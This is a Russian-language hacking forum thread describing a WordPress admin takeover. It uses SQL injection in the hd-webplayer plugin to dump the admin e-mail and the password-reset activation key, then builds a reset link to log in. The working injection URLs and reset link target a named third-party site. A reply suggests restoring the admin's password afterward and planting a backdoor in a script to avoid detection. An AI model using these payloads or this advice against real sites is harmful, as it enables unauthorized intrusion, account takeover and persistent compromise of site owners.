![]() |
Приветствую. Решил написать небольшую заметку.
Как вы знаете чтобы зайти в админ-панель Wordpress, нужно расшифровать хэш администратора. Но я понял как входить в панель без ожидания расшифровки хэша. Покажу на примере. У нас есть блог, где мы уже вывели данные из таблицы wp_users. Торопится выводить пароль не стоит, выведем e-mail администратора: Код:
http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users--Цитата:
Вводим e-mail администратора который мы получили выше, и отправляем письмо. Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД. Делаем такой запрос: Код:
http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users--Цитата:
Код:
www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=adminДалее привычная авторизация. Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail(). Способ работает не везде. (с) MaxFast |
Аммм...сорри ТС а для какой версии WP?
И как получить хэш для версии 3.4.1 |
Цитата:
Все данные я вытянул с помощью SQL Injection в плагине. |
Цитата:
|
ТС скажи пожайлуста как я понял то даже хеша пароля не нужно знать?
|
Цитата:
Главное узнать e-mail, и активационный код. |
Цитата:
|
Цитата:
|
Цитата:
|
Хм спасибо извлек для себя новое)А по поводу палева-если цель не очень то может и админ оказаться не совсем компетентным просто вернуть пасс обратно и забэкдорить какой нить скрипт авось и не заметит)
А если какойнибудь крупный сайт то тут уж и денег не жалко ящик его проспамить. Лови +++ |
| Время: 20:31 |